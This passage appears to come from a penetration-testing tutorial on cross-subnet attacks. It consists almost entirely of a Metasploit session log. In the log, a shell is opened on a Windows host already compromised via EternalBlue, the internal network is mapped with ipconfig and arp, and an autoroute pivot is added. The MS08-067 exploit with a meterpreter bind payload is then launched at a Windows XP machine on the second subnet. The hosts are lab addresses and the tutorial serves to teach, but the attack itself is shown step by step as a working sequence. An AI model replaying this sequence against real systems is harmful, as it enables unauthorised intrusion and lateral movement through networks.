Windows Network Service Penetration Testing in Practice: Cross-Subnet Attack (Part 3)


[+] 192.168.43.99:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > shell
Process 7924 created.
Channel 1 created.
Microsoft Windows [?汾 6.1.7601]
??????? (c) 2009 Microsoft Corporation???????????????
C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001
C:\Windows\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter ???????? 2:
Connection-specific DNS Suffix . : localdomain
Link-local IPv6 Address . . . . . : fe80::e970:4199:33c6:f0f3%21
IPv4 Address. . . . . . . . . . . : 192.168.232.145
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.232.2
Ethernet adapter Bluetooth ????????:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Ethernet adapter ????????:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : 240e:468:81:203c:6d7a:d608:7ec3:80e
Temporary IPv6 Address. . . . . . : 240e:468:81:203c:b1e9:713c:1d5d:3a38
Link-local IPv6 Address . . . . . : fe80::6d7a:d608:7ec3:80e%11
IPv4 Address. . . . . . . . . . . : 192.168.43.99
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::284a:4a93:2ef9:661b%11
192.168.43.1
Tunnel adapter isatap.{D0C9B1FF-3866-45AB-BD3C-6BCCE51D708F}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Tunnel adapter isatap.{AA43B9EC-6828-4E2A-ACED-837F5FF4C2C8}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Tunnel adapter isatap.localdomain:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Windows\system32>arp -a
arp -a
Interface: 192.168.43.99 --- 0xb
Internet Address Physical Address Type
192.168.43.1 12-2b-33-95-ca-ca dynamic
192.168.43.89 00-0c-29-68-f4-d1 dynamic
192.168.43.107 50-e0-85-a8-bc-86 dynamic
192.168.43.162 50-e0-85-a8-bc-86 dynamic
192.168.43.170 50-e0-85-a8-bc-86 dynamic
192.168.43.223 c0-3c-59-b9-be-3c dynamic
192.168.43.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
239.255.255.250 01-00-5e-7f-ff-fa static
255.255.255.255 ff-ff-ff-ff-ff-ff static
Interface: 192.168.232.145 --- 0x15
Internet Address Physical Address Type
192.168.232.1 00-50-56-c0-00-08 dynamic
192.168.232.2 00-50-56-fb-6f-4e dynamic
192.168.232.128 00-0c-29-52-81-07 dynamic
192.168.232.254 00-50-56-e3-a4-9f dynamic
192.168.232.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
239.255.255.250 01-00-5e-7f-ff-fa static
255.255.255.255 ff-ff-ff-ff-ff-ff static
C:\Windows\system32>exit
meterpreter > run autoroute -s 192.168.232.128/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.232.128/255.255.255.0...
[+] Added route to 192.168.232.128/255.255.255.0 via 192.168.43.99
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.232.128 255.255.255.0 Session 1
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms17_010_eternalblue) > search ms08-067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.232.128
rhost => 192.168.232.128
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] 192.168.232.128:445 - Automatically detecting the target...
[*] 192.168.232.128:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.232.128:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)

